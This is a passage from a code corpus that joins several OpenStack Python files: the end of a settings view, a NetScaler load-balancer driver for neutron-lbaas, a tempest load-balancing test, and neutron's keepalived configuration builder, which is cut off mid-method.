if lang_code and translation.check_for_language(lang_code):
response = functions.save_config_value(
request, response, settings.LANGUAGE_COOKIE_NAME, lang_code)
response = functions.save_config_value(
request, response, 'django_timezone',
pytz.timezone(data['timezone']).zone)
response = functions.save_config_value(
request, response, 'API_RESULT_PAGE_SIZE', data['pagesize'])
response = functions.save_config_value(
request, response, 'INSTANCE_LOG_LENGTH',
data['instance_log_length'])
with translation.override(lang_code):
messages.success(request,
encoding.force_text(_("Settings saved.")))
return response
``` |
{
"source": "2020human/neutron-lbaas",
"score": 2
} |
#### File: drivers/netscaler/netscaler_driver_v2.py
```python
import abc
from oslo_config import cfg
from oslo_log import log as logging
from neutron import context as ncontext
from neutron.plugins.common import constants
from oslo_service import service
from neutron_lbaas._i18n import _, _LE
from neutron_lbaas.drivers import driver_base
from neutron_lbaas.drivers import driver_mixins
from neutron_lbaas.services.loadbalancer.drivers.netscaler import ncc_client
DEFAULT_PERIODIC_TASK_INTERVAL = "2"
DEFAULT_STATUS_COLLECTION = "True"
DEFAULT_PAGE_SIZE = "300"
DEFAULT_IS_SYNCRONOUS = "True"
PROV = "provisioning_status"
NETSCALER = "netscaler"
LOG = logging.getLogger(__name__)
NETSCALER_CC_OPTS = [
cfg.StrOpt(
'netscaler_ncc_uri',
help=_('The URL to reach the NetScaler Control Center Server.'),
),
cfg.StrOpt(
'netscaler_ncc_username',
help=_('Username to login to the NetScaler Control Center Server.'),
),
cfg.StrOpt(
'netscaler_ncc_password',
secret=True,
help=_('Password to login to the NetScaler Control Center Server.'),
),
cfg.StrOpt(
'periodic_task_interval',
default=DEFAULT_PERIODIC_TASK_INTERVAL,
help=_('Setting for periodic task collection interval from'
'NetScaler Control Center Server..'),
),
cfg.StrOpt(
'is_synchronous',
default=DEFAULT_IS_SYNCRONOUS,
help=_('Setting for option to enable synchronous operations'
'NetScaler Control Center Server.'),
),
cfg.StrOpt(
'netscaler_ncc_cleanup_mode',
help=_(
'Setting to enable/disable cleanup mode for NetScaler Control '
'Center Server'),
),
cfg.StrOpt(
'netscaler_status_collection',
default=DEFAULT_STATUS_COLLECTION + "," + DEFAULT_PAGE_SIZE,
help=_('Setting for member status collection from'
'NetScaler Control Center Server.'),
)
]
if not hasattr(cfg.CONF, "netscaler_driver"):
cfg.CONF.register_opts(NETSCALER_CC_OPTS, 'netscaler_driver')
LBS_RESOURCE = 'loadbalancers'
LB_RESOURCE = 'loadbalancer'
LISTENERS_RESOURCE = 'listeners'
LISTENER_RESOURCE = 'listener'
POOLS_RESOURCE = 'pools'
POOL_RESOURCE = 'pool'
MEMBERS_RESOURCE = 'members'
MEMBER_RESOURCE = 'member'
MONITORS_RESOURCE = 'healthmonitors'
MONITOR_RESOURCE = 'healthmonitor'
STATS_RESOURCE = 'stats'
PROV_SEGMT_ID = 'provider:segmentation_id'
PROV_NET_TYPE = 'provider:network_type'
DRIVER_NAME = 'netscaler_driver'
RESOURCE_PREFIX = 'v2.0/lbaas'
STATUS_PREFIX = 'oca/v2'
MEMBER_STATUS = 'memberstatus'
PAGE = 'page'
SIZE = 'size'
PROVISIONING_STATUS_TRACKER = []
class NetScalerLoadBalancerDriverV2(driver_base.LoadBalancerBaseDriver):
def __init__(self, plugin):
super(NetScalerLoadBalancerDriverV2, self).__init__(plugin)
self.driver_conf = cfg.CONF.netscaler_driver
self.admin_ctx = ncontext.get_admin_context()
self._init_client()
self._init_managers()
self._init_status_collection()
def _init_client(self):
ncc_uri = self.driver_conf.netscaler_ncc_uri
ncc_username = self.driver_conf.netscaler_ncc_username
ncc_password = self.driver_conf.netscaler_ncc_password
ncc_cleanup_mode = cfg.CONF.netscaler_driver.netscaler_ncc_cleanup_mode
self.client = ncc_client.NSClient(ncc_uri,
ncc_username,
ncc_password,
ncc_cleanup_mode)
def _init_managers(self):
self.load_balancer = NetScalerLoadBalancerManager(self)
self.listener = NetScalerListenerManager(self)
self.pool = NetScalerPoolManager(self)
self.member = NetScalerMemberManager(self)
self.health_monitor = NetScalerHealthMonitorManager(self)
def _init_status_collection(self):
self.status_conf = self.driver_conf.netscaler_status_collection
self.periodic_task_interval = self.driver_conf.periodic_task_interval
status_conf = self.driver_conf.netscaler_status_collection
(is_status_collection,
pagesize_status_collection) = status_conf.split(",")
self.is_status_collection = True
if is_status_collection.lower() == "false":
self.is_status_collection = False
self.pagesize_status_collection = pagesize_status_collection
self._init_pending_status_tracker()
NetScalerStatusService(self).start()
def _init_pending_status_tracker(self):
# Initialize PROVISIONING_STATUS_TRACKER for loadbalancers in
# pending state
db_lbs = self.plugin.db.get_loadbalancers(
self.admin_ctx)
for db_lb in db_lbs:
if ((db_lb.id not in PROVISIONING_STATUS_TRACKER) and
(db_lb.provider.provider_name == NETSCALER) and
(db_lb.provisioning_status.startswith("PENDING_"))):
PROVISIONING_STATUS_TRACKER.append(db_lb.id)
def collect_provision_status(self):
msg = ("Collecting status ", self.periodic_task_interval)
LOG.debug(msg)
self._update_loadbalancers_provision_status()
def _update_loadbalancers_provision_status(self):
for lb_id in PROVISIONING_STATUS_TRACKER:
lb_statuses = self._get_loadbalancer_statuses(lb_id)
if lb_statuses:
self._update_status_tree_in_db(
lb_id, lb_statuses["lb_statuses"])
def _get_loadbalancer_statuses(self, lb_id):
"""Retrieve listener status from Control Center."""
resource_path = "%s/%s/%s/statuses" % (RESOURCE_PREFIX,
LBS_RESOURCE,
lb_id)
try:
statuses = self.client.retrieve_resource(
"GLOBAL", resource_path)[1]['dict']
except ncc_client.NCCException as e:
if e.is_not_found_exception():
return {"lb_statuses": None}
else:
return None
statuses = statuses["statuses"]
return {"lb_statuses": statuses}
def _update_status_tree_in_db(self, lb_id, loadbalancer_statuses):
track_loadbalancer = {"track": False}
db_lb = self.plugin.db.get_loadbalancer(self.admin_ctx,
lb_id)
if (not loadbalancer_statuses and
db_lb.provisioning_status == constants.PENDING_DELETE):
try:
self.load_balancer.successful_completion(
self.admin_ctx, db_lb, delete=True)
except Exception:
LOG.error(_LE("error with successful completion"))
PROVISIONING_STATUS_TRACKER.remove(lb_id)
return
else:
status_lb = loadbalancer_statuses["loadbalancer"]
status_listeners = status_lb["listeners"]
for db_listener in db_lb.listeners:
db_listener.loadbalancer = db_lb
status_listener = (self.
_update_entity_status_in_db(track_loadbalancer,
db_listener,
status_listeners,
self.listener))
if not status_listener:
continue
db_pool = db_listener.default_pool
if not db_pool:
continue
db_pool.listener = db_listener
status_pools = status_listener['pools']
status_pool = self._update_entity_status_in_db(track_loadbalancer,
db_pool,
status_pools,
self.pool)
db_members = db_pool.members
if not status_pool:
continue
status_members = status_pool['members']
for db_member in db_members:
db_member.pool = db_pool
self._update_entity_status_in_db(track_loadbalancer,
db_member,
status_members,
self.member)
db_hm = db_pool.healthmonitor
if db_hm:
db_hm.pool = db_pool
status_hm = status_pool['healthmonitor']
self._update_entity_status_in_db(track_loadbalancer,
db_hm,
[status_hm],
self.health_monitor)
if not track_loadbalancer['track']:
self._update_entity_status_in_db(
track_loadbalancer, db_lb, status_lb, self.load_balancer)
if not track_loadbalancer['track']:
PROVISIONING_STATUS_TRACKER.remove(lb_id)
def _update_entity_status_in_db(self, track_loadbalancer,
db_entity,
status_entities,
entity_manager):
if isinstance(status_entities, list):
entity_status = self._get_entity_status(
db_entity.id, status_entities)
else:
entity_status = status_entities
self._check_and_update_entity_status_in_db(
track_loadbalancer, db_entity, entity_status, entity_manager)
return entity_status
def _get_entity_status(self, entity_id, entities_status):
for entity_status in entities_status:
if entity_status and entity_status['id'] == entity_id:
return entity_status
return None
def _check_and_update_entity_status_in_db(self, track_loadbalancer,
db_entity,
entity_status, entity_manager):
if not db_entity.provisioning_status.startswith("PENDING_"):
# no operation is attempted on this entity
return
if entity_status:
if entity_status[PROV].startswith("PENDING_"):
# an entity is not finished provisioning. Continue to track
track_loadbalancer['track'] = True
return
if entity_status[PROV] == constants.ERROR:
# Marked for failed completion
try:
entity_manager.failed_completion(
self.admin_ctx, db_entity)
except Exception:
LOG.error(_LE("error with failed completion"))
return
if db_entity.provisioning_status == constants.PENDING_DELETE:
# entity is under deletion
# if entity is missing in lb status tree it should to be
# deleted
if entity_status:
msg = ('Invalid status set for delete of %s in statuses',
db_entity.id)
LOG.error(msg)
return
try:
entity_manager.successful_completion(
self.admin_ctx, db_entity, delete=True)
except Exception:
LOG.error(_LE("error with successful completion"))
return
if entity_status[PROV] != constants.ACTIVE:
msg = ('Invalid prov status for %s, should be ACTIVE '
"for CREATE and UPDATE",
db_entity.id)
LOG.error(msg)
return
try:
entity_manager.successful_completion(
self.admin_ctx, db_entity)
except Exception:
LOG.error(_LE("error with successful completion"))
return
class NetScalerCommonManager(driver_mixins.BaseManagerMixin):
def __init__(self, driver):
super(NetScalerCommonManager, self).__init__(driver)
self.payload_preparer = PayloadPreparer()
self.client = self.driver.client
self.is_synchronous = self.driver.driver_conf.is_synchronous
if self.is_synchronous.lower() == "false":
self.is_synchronous = False
else:
self.is_synchronous = True
def create(self, context, obj):
LOG.debug("%s, create %s", self.__class__.__name__, obj.id)
try:
self.create_entity(context, obj)
if self.is_synchronous:
self.successful_completion(context, obj)
else:
self.track_provision_status(obj)
except Exception:
self.failed_completion(context, obj)
raise
def update(self, context, old_obj, obj):
LOG.debug("%s, update %s", self.__class__.__name__, old_obj.id)
try:
self.update_entity(context, old_obj, obj)
if self.is_synchronous:
self.successful_completion(context, obj)
else:
self.track_provision_status(obj)
except Exception:
self.failed_completion(context, obj)
raise
def delete(self, context, obj):
LOG.debug("%s, delete %s", self.__class__.__name__, obj.id)
try:
self.delete_entity(context, obj)
if self.is_synchronous:
self.successful_completion(context, obj, delete=True)
else:
self.track_provision_status(obj)
except Exception:
self.failed_completion(context, obj)
raise
def track_provision_status(self, obj):
for lb in self._get_loadbalancers(obj):
if lb.id not in PROVISIONING_STATUS_TRACKER:
PROVISIONING_STATUS_TRACKER.append(lb.id)
def _get_loadbalancers(self, obj):
lbs = []
lbs.append(obj.root_loadbalancer)
return lbs
@abc.abstractmethod
def create_entity(self, context, obj):
pass
@abc.abstractmethod
def update_entity(self, context, old_obj, obj):
pass
@abc.abstractmethod
def delete_entity(self, context, obj):
pass
class NetScalerLoadBalancerManager(NetScalerCommonManager,
driver_base.BaseLoadBalancerManager):
def __init__(self, driver):
driver_base.BaseLoadBalancerManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def refresh(self, context, lb_obj):
# This is intended to trigger the backend to check and repair
# the state of this load balancer and all of its dependent objects
LOG.debug("LB refresh %s", lb_obj.id)
def stats(self, context, lb_obj):
pass
def create_entity(self, context, lb_obj):
ncc_lb = self.payload_preparer.prepare_lb_for_creation(lb_obj)
vip_subnet_id = lb_obj.vip_subnet_id
network_info = self.payload_preparer.\
get_network_info(context, self.driver.plugin, vip_subnet_id)
ncc_lb.update(network_info)
msg = _("NetScaler driver lb creation: %s") % repr(ncc_lb)
LOG.debug(msg)
resource_path = "%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
LB_RESOURCE, ncc_lb)
def update_entity(self, context, old_lb_obj, lb_obj):
update_lb = self.payload_preparer.prepare_lb_for_update(lb_obj)
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_obj.id)
msg = (_("NetScaler driver lb_obj %(lb_obj_id)s update: %(lb_obj)s") %
{"lb_obj_id": old_lb_obj.id, "lb_obj": repr(lb_obj)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
LB_RESOURCE, update_lb)
def delete_entity(self, context, lb_obj):
"""Delete a loadbalancer on a NetScaler device."""
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_obj.id)
msg = _("NetScaler driver lb_obj removal: %s") % lb_obj.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class NetScalerListenerManager(NetScalerCommonManager,
driver_base.BaseListenerManager):
def __init__(self, driver):
driver_base.BaseListenerManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def stats(self, context, listener):
# returning dummy status now
LOG.debug(
"Tenant id %s , Listener stats %s", context.tenant_id, listener.id)
return {
"bytes_in": 0,
"bytes_out": 0,
"active_connections": 0,
"total_connections": 0
}
def create_entity(self, context, listener):
"""Listener is created with loadbalancer """
ncc_listener = self.payload_preparer.prepare_listener_for_creation(
listener)
msg = _("NetScaler driver listener creation: %s") % repr(ncc_listener)
LOG.debug(msg)
resource_path = "%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
LISTENER_RESOURCE, ncc_listener)
def update_entity(self, context, old_listener, listener):
update_listener = self.payload_preparer.prepare_listener_for_update(
listener)
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE,
listener.id)
msg = (_("NetScaler driver listener %(listener_id)s "
"update: %(listener_obj)s") %
{"listener_id": old_listener.id,
"listener_obj": repr(listener)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
LISTENER_RESOURCE, update_listener)
def delete_entity(self, context, listener):
"""Delete a listener on a NetScaler device."""
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE,
listener.id)
msg = _("NetScaler driver listener removal: %s") % listener.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class NetScalerPoolManager(NetScalerCommonManager,
driver_base.BasePoolManager):
def __init__(self, driver):
driver_base.BasePoolManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def create_entity(self, context, pool):
ncc_pool = self.payload_preparer.prepare_pool_for_creation(
pool)
msg = _("NetScaler driver pool creation: %s") % repr(ncc_pool)
LOG.debug(msg)
resource_path = "%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
POOL_RESOURCE, ncc_pool)
def update_entity(self, context, old_pool, pool):
update_pool = self.payload_preparer.prepare_pool_for_update(pool)
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE,
pool.id)
msg = (_("NetScaler driver pool %(pool_id)s update: %(pool_obj)s") %
{"pool_id": old_pool.id, "pool_obj": repr(pool)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
POOL_RESOURCE, update_pool)
def delete_entity(self, context, pool):
"""Delete a pool on a NetScaler device."""
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE,
pool.id)
msg = _("NetScaler driver pool removal: %s") % pool.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class NetScalerMemberManager(NetScalerCommonManager,
driver_base.BaseMemberManager):
def __init__(self, driver):
driver_base.BaseMemberManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def create_entity(self, context, member):
ncc_member = self.payload_preparer.prepare_member_for_creation(member)
subnet_id = member.subnet_id
network_info = (self.payload_preparer.
get_network_info(context, self.driver.plugin,
subnet_id))
ncc_member.update(network_info)
msg = _("NetScaler driver member creation: %s") % repr(ncc_member)
LOG.debug(msg)
parent_pool_id = member.pool.id
resource_path = "%s/%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE,
parent_pool_id, MEMBERS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
MEMBER_RESOURCE, ncc_member)
def update_entity(self, context, old_member, member):
parent_pool_id = member.pool.id
update_member = self.payload_preparer.prepare_member_for_update(member)
resource_path = "%s/%s/%s/%s/%s" % (RESOURCE_PREFIX,
POOLS_RESOURCE,
parent_pool_id,
MEMBERS_RESOURCE,
member.id)
msg = (_("NetScaler driver member %(member_id)s "
"update: %(member_obj)s") %
{"member_id": old_member.id, "member_obj": repr(member)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
MEMBER_RESOURCE, update_member)
def delete_entity(self, context, member):
"""Delete a member on a NetScaler device."""
parent_pool_id = member.pool.id
resource_path = "%s/%s/%s/%s/%s" % (RESOURCE_PREFIX,
POOLS_RESOURCE,
parent_pool_id,
MEMBERS_RESOURCE,
member.id)
msg = _("NetScaler driver member removal: %s") % member.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class NetScalerHealthMonitorManager(NetScalerCommonManager,
driver_base.BaseHealthMonitorManager):
def __init__(self, driver):
driver_base.BaseHealthMonitorManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def create_entity(self, context, hm):
ncc_hm = self.payload_preparer.prepare_healthmonitor_for_creation(hm)
msg = _("NetScaler driver healthmonitor creation: %s") % repr(ncc_hm)
LOG.debug(msg)
resource_path = "%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
MONITOR_RESOURCE, ncc_hm)
def update_entity(self, context, old_healthmonitor, hm):
update_hm = self.payload_preparer.prepare_healthmonitor_for_update(hm)
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE,
hm.id)
msg = (_("NetScaler driver healthmonitor %(healthmonitor_id)s "
"update: %(healthmonitor_obj)s") %
{"healthmonitor_id": old_healthmonitor.id,
"healthmonitor_obj": repr(hm)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
MONITOR_RESOURCE, update_hm)
def delete_entity(self, context, hm):
"""Delete a healthmonitor on a NetScaler device."""
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE,
hm.id)
msg = _("NetScaler driver healthmonitor removal: %s") % hm.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class PayloadPreparer(object):
def prepare_lb_for_creation(self, lb):
creation_attrs = {
'id': lb.id,
'tenant_id': lb.tenant_id,
'vip_address': lb.vip_address,
'vip_subnet_id': lb.vip_subnet_id,
}
update_attrs = self.prepare_lb_for_update(lb)
creation_attrs.update(update_attrs)
return creation_attrs
def prepare_lb_for_update(self, lb):
return {
'name': lb.name,
'description': lb.description,
'admin_state_up': lb.admin_state_up,
}
def prepare_listener_for_creation(self, listener):
creation_attrs = {
'id': listener.id,
'tenant_id': listener.tenant_id,
'protocol': listener.protocol,
'protocol_port': listener.protocol_port,
'loadbalancer_id': listener.loadbalancer_id
}
update_attrs = self.prepare_listener_for_update(listener)
creation_attrs.update(update_attrs)
return creation_attrs
def prepare_listener_for_update(self, listener):
sni_container_ids = self.prepare_sni_container_ids(listener)
listener_dict = {
'name': listener.name,
'description': listener.description,
'sni_container_ids': sni_container_ids,
'default_tls_container_id': listener.default_tls_container_id,
'connection_limit': listener.connection_limit,
'admin_state_up': listener.admin_state_up
}
return listener_dict
def prepare_pool_for_creation(self, pool):
create_attrs = {
'id': pool.id,
'tenant_id': pool.tenant_id,
'listener_id': pool.listener.id,
'protocol': pool.protocol,
}
update_attrs = self.prepare_pool_for_update(pool)
create_attrs.update(update_attrs)
return create_attrs
def prepare_pool_for_update(self, pool):
update_attrs = {
'name': pool.name,
'description': pool.description,
'lb_algorithm': pool.lb_algorithm,
'admin_state_up': pool.admin_state_up
}
if pool.session_persistence:
peristence = pool.session_persistence
peristence_payload = self.prepare_sessionpersistence(peristence)
update_attrs['session_persistence'] = peristence_payload
return update_attrs
def prepare_sessionpersistence(self, persistence):
return {
'type': persistence.type,
'cookie_name': persistence.cookie_name
}
def prepare_members_for_pool(self, members):
members_attrs = []
for member in members:
member_attrs = self.prepare_member_for_creation(member)
members_attrs.append(member_attrs)
return members_attrs
def prepare_member_for_creation(self, member):
creation_attrs = {
'id': member.id,
'tenant_id': member.tenant_id,
'address': member.address,
'protocol_port': member.protocol_port,
'subnet_id': member.subnet_id
}
update_attrs = self.prepare_member_for_update(member)
creation_attrs.update(update_attrs)
return creation_attrs
def prepare_member_for_update(self, member):
return {
'weight': member.weight,
'admin_state_up': member.admin_state_up,
}
def prepare_healthmonitor_for_creation(self, health_monitor):
creation_attrs = {
'id': health_monitor.id,
'tenant_id': health_monitor.tenant_id,
'pool_id': health_monitor.pool.id,
'type': health_monitor.type,
}
update_attrs = self.prepare_healthmonitor_for_update(health_monitor)
creation_attrs.update(update_attrs)
return creation_attrs
def prepare_healthmonitor_for_update(self, health_monitor):
ncc_hm = {
'delay': health_monitor.delay,
'timeout': health_monitor.timeout,
'max_retries': health_monitor.max_retries,
'admin_state_up': health_monitor.admin_state_up,
}
if health_monitor.type in ['HTTP', 'HTTPS']:
ncc_hm['http_method'] = health_monitor.http_method
ncc_hm['url_path'] = health_monitor.url_path
ncc_hm['expected_codes'] = health_monitor.expected_codes
return ncc_hm
def get_network_info(self, context, plugin, subnet_id):
network_info = {}
subnet = plugin.db._core_plugin.get_subnet(context, subnet_id)
network_id = subnet['network_id']
network = plugin.db._core_plugin.get_network(context, network_id)
network_info['network_id'] = network_id
network_info['subnet_id'] = subnet_id
if PROV_NET_TYPE in network:
network_info['network_type'] = network[PROV_NET_TYPE]
if PROV_SEGMT_ID in network:
network_info['segmentation_id'] = network[PROV_SEGMT_ID]
return network_info
def prepare_sni_container_ids(self, listener):
sni_container_ids = []
for sni_container in listener.sni_containers:
sni_container_ids.append(sni_container.tls_container_id)
return sni_container_ids
class NetScalerStatusService(service.Service):
def __init__(self, driver):
super(NetScalerStatusService, self).__init__()
self.driver = driver
def start(self):
super(NetScalerStatusService, self).start()
self.tg.add_timer(
int(self.driver.periodic_task_interval),
self.driver.collect_provision_status,
None
)
```
#### File: v2/scenario/test_load_balancer_basic.py
```python
from tempest import test
from neutron_lbaas.tests.tempest.v2.scenario import base
class TestLoadBalancerBasic(base.BaseTestCase):
@test.services('compute', 'network')
def test_load_balancer_basic(self):
"""This test checks basic load balancing.
The following is the scenario outline:
1. Create an instance.
2. SSH to the instance and start two servers.
3. Create a load balancer with two members and with ROUND_ROBIN
algorithm.
4. Associate the VIP with a floating ip.
5. Send NUM requests to the floating ip and check that they are shared
between the two servers.
"""
self._create_server('server1')
self._start_servers()
self._create_load_balancer()
self._check_load_balancing()
``` |
{
"source": "2020human/neutron",
"score": 2
} |
#### File: agent/linux/keepalived.py
```python
import errno
import itertools
import os
import netaddr
from neutron_lib import exceptions
from neutron_lib.utils import file as file_utils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import fileutils
from neutron._i18n import _, _LE
from neutron.agent.linux import external_process
from neutron.common import constants
VALID_STATES = ['MASTER', 'BACKUP']
VALID_AUTH_TYPES = ['AH', 'PASS']
HA_DEFAULT_PRIORITY = 50
PRIMARY_VIP_RANGE_SIZE = 24
KEEPALIVED_SERVICE_NAME = 'keepalived'
KEEPALIVED_EMAIL_FROM = '<EMAIL>'
KEEPALIVED_ROUTER_ID = 'neutron'
GARP_MASTER_DELAY = 60
LOG = logging.getLogger(__name__)
def get_free_range(parent_range, excluded_ranges, size=PRIMARY_VIP_RANGE_SIZE):
"""Get a free IP range, from parent_range, of the specified size.
:param parent_range: String representing an IP range. E.g: '169.254.0.0/16'
:param excluded_ranges: A list of strings to be excluded from parent_range
:param size: What should be the size of the range returned?
:return: A string representing an IP range
"""
free_cidrs = netaddr.IPSet([parent_range]) - netaddr.IPSet(excluded_ranges)
for cidr in free_cidrs.iter_cidrs():
if cidr.prefixlen <= size:
return '%s/%s' % (cidr.network, size)
raise ValueError(_('Network of size %(size)s, from IP range '
'%(parent_range)s excluding IP ranges '
'%(excluded_ranges)s was not found.') %
{'size': size,
'parent_range': parent_range,
'excluded_ranges': excluded_ranges})
class InvalidInstanceStateException(exceptions.NeutronException):
message = _('Invalid instance state: %(state)s, valid states are: '
'%(valid_states)s')
def __init__(self, **kwargs):
if 'valid_states' not in kwargs:
kwargs['valid_states'] = ', '.join(VALID_STATES)
super(InvalidInstanceStateException, self).__init__(**kwargs)
class InvalidAuthenticationTypeException(exceptions.NeutronException):
message = _('Invalid authentication type: %(auth_type)s, '
'valid types are: %(valid_auth_types)s')
def __init__(self, **kwargs):
if 'valid_auth_types' not in kwargs:
kwargs['valid_auth_types'] = ', '.join(VALID_AUTH_TYPES)
super(InvalidAuthenticationTypeException, self).__init__(**kwargs)
class KeepalivedVipAddress(object):
"""A virtual address entry of a keepalived configuration."""
def __init__(self, ip_address, interface_name, scope=None):
self.ip_address = ip_address
self.interface_name = interface_name
self.scope = scope
def __eq__(self, other):
return (isinstance(other, KeepalivedVipAddress) and
self.ip_address == other.ip_address)
def __str__(self):
return '[%s, %s, %s]' % (self.ip_address,
self.interface_name,
self.scope)
def build_config(self):
result = '%s dev %s' % (self.ip_address, self.interface_name)
if self.scope:
result += ' scope %s' % self.scope
return result
class KeepalivedVirtualRoute(object):
"""A virtual route entry of a keepalived configuration."""
def __init__(self, destination, nexthop, interface_name=None,
scope=None):
self.destination = destination
self.nexthop = nexthop
self.interface_name = interface_name
self.scope = scope
def build_config(self):
output = self.destination
if self.nexthop:
output += ' via %s' % self.nexthop
if self.interface_name:
output += ' dev %s' % self.interface_name
if self.scope:
output += ' scope %s' % self.scope
return output
class KeepalivedInstanceRoutes(object):
def __init__(self):
self.gateway_routes = []
self.extra_routes = []
self.extra_subnets = []
def remove_routes_on_interface(self, interface_name):
self.gateway_routes = [gw_rt for gw_rt in self.gateway_routes
if gw_rt.interface_name != interface_name]
# NOTE(amuller): extra_routes are initialized from the router's
# 'routes' attribute. These routes do not have an interface
# parameter and so cannot be removed via an interface_name lookup.
self.extra_subnets = [route for route in self.extra_subnets if
route.interface_name != interface_name]
@property
def routes(self):
return self.gateway_routes + self.extra_routes + self.extra_subnets
def __len__(self):
return len(self.routes)
def build_config(self):
return itertools.chain([' virtual_routes {'],
(' %s' % route.build_config()
for route in self.routes),
[' }'])
class KeepalivedInstance(object):
"""Instance section of a keepalived configuration."""
def __init__(self, state, interface, vrouter_id, ha_cidrs,
priority=HA_DEFAULT_PRIORITY, advert_int=None,
mcast_src_ip=None, nopreempt=False,
garp_master_delay=GARP_MASTER_DELAY):
self.name = 'VR_%s' % vrouter_id
if state not in VALID_STATES:
raise InvalidInstanceStateException(state=state)
self.state = state
self.interface = interface
self.vrouter_id = vrouter_id
self.priority = priority
self.nopreempt = nopreempt
self.advert_int = advert_int
self.mcast_src_ip = mcast_src_ip
self.garp_master_delay = garp_master_delay
self.track_interfaces = []
self.vips = []
self.virtual_routes = KeepalivedInstanceRoutes()
self.authentication = None
self.primary_vip_range = get_free_range(
parent_range=constants.PRIVATE_CIDR_RANGE,
excluded_ranges=[constants.METADATA_CIDR,
constants.DVR_FIP_LL_CIDR] + ha_cidrs,
size=PRIMARY_VIP_RANGE_SIZE)
def set_authentication(self, auth_type, password):
if auth_type not in VALID_AUTH_TYPES:
raise InvalidAuthenticationTypeException(auth_type=auth_type)
self.authentication = (auth_type, password)
def add_vip(self, ip_cidr, interface_name, scope):
vip = KeepalivedVipAddress(ip_cidr, interface_name, scope)
if vip not in self.vips:
self.vips.append(vip)
else:
LOG.debug('VIP %s already present in %s', vip, self.vips)
def remove_vips_vroutes_by_interface(self, interface_name):
self.vips = [vip for vip in self.vips
if vip.interface_name != interface_name]
self.virtual_routes.remove_routes_on_interface(interface_name)
def remove_vip_by_ip_address(self, ip_address):
self.vips = [vip for vip in self.vips
if vip.ip_address != ip_address]
def get_existing_vip_ip_addresses(self, interface_name):
return [vip.ip_address for vip in self.vips
if vip.interface_name == interface_name]
def _build_track_interface_config(self):
return itertools.chain(
[' track_interface {'],
(' %s' % i for i in self.track_interfaces),
[' }'])
def get_primary_vip(self):
"""Return an address in the primary_vip_range CIDR, with the router's
VRID in the host section.
For example, if primary_vip_range is 169.254.0.0/24, and this router's
VRID is 5, the result is 169.254.0.5. Using the VRID assures that
the primary VIP is consistent amongst HA router instances on different
nodes.
"""
ip = (netaddr.IPNetwork(self.primary_vip_range).network +
self.vrouter_id)
return str(netaddr.IPNetwork('%s/%s' % (ip, PRIMARY_VIP_RANGE_SIZE)))
def _build_vips_config(self):
# NOTE(amuller): The primary VIP must be consistent in order to avoid
# keepalived bugs. Changing the VIP in the 'virtual_ipaddress' and
# SIGHUP'ing keepalived can remove virtual routers, including the
# router's default gateway.
# We solve this by never changing the VIP in the virtual_ipaddress
# section, herein known as the primary VIP.
# The only interface known to exist for HA routers is the HA interface
# (self.interface). We generate an IP on that device and use it as the
# primary VIP. The other VIPs (Internal interfaces IPs, the external
# interface IP and floating IPs) are placed in the
# virtual_ipaddress_excluded section.
primary = KeepalivedVipAddress(self.get_primary_vip(), self.interface)
vips_result = [' virtual_ipaddress {',
' %s' % primary.build_config(),
' }']
if self.vips:
vips_result.extend(
itertools.chain([' virtual_ipaddress_excluded {'],
(' %s' % vip.build_config()
for vip in
sorted(self.vips,
key=lambda vip: vip.ip_address)),
[' }']))
return vips_result
def _build_virtual_routes_config(self):
return itertools.chain([' virtual_routes {'],
(' %s' % route.build_config()
for route in self.virtual_routes),
[' }'])
def build_config(self):
config = ['vrrp_instance %s {' % self.name,
' state %s' % self.state,
' interface %s' % self.interface,
' virtual_router_id %s' % self.vrouter_id,
' priority %s' % self.priority,
' garp_master_delay %s' % self.garp_master_delay]
if self.nopreempt:
config.append(' nopreempt')
if self.advert_int:
config.append(' advert_int %s' % self.advert_int)
if self.authentication:
auth_type, password = self.authentication
authentication = [' authentication {',
' auth_type %s' % auth_type,
' auth_pass %s' % password,
' }']
config.extend(authentication)
if self.mcast_src_ip:
config.append(' mcast_src_ip %s' % self.mcast_src_ip)
if self.track_interfaces:
config.extend(self._build_track_interface_config())
config.extend(self._build_vips_config())
if len(self.virtual_routes):
config.extend(self.virtual_routes.build_config())
config.append('}')
return config
class KeepalivedConf(object):
"""A keepalived configuration."""
def __init__(self):
self.reset()
def reset(self):
self.instances = {}
def add_instance(self, instance):
self.instances[instance.vrouter_id] = instance
def get_instance(self, vrouter_id):
return self.instances.get(vrouter_id)
def build_config(self):
